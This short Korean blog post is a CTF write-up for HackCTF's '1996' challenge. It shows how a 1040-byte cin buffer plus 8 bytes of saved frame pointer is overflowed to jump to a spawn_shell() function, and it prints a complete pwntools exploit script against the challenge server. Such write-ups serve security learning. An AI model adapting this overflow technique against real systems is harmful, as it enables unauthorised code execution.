시스템 해킹/HackCTF
HackCTF - 1996
ii4gsp
2020. 2. 16. 20:00
파일을 다운받아 주자.
IDA로 열어보면 cin으로 name에 입력을 받는다.
name은 0x410 즉, 1040만큼 할당되었다.
SFP 8byte를 더하여 1048byte dummy를 넣어주고 쉘을 실행해주는 spawn_shell()함수의 주소를 넣어주면 된다.
spawn_shell()함수의 주소는 0x0000000000400897 이다.
Exploit
from pwn import *
r = remote('ctf.j0n9hyun.xyz', 3013)
payload = ''
payload += '\x90' * 1048
payload += p64(0x0000000000400897)
r.sendline(payload)
r.interactive()
소스코드를 작성해주자.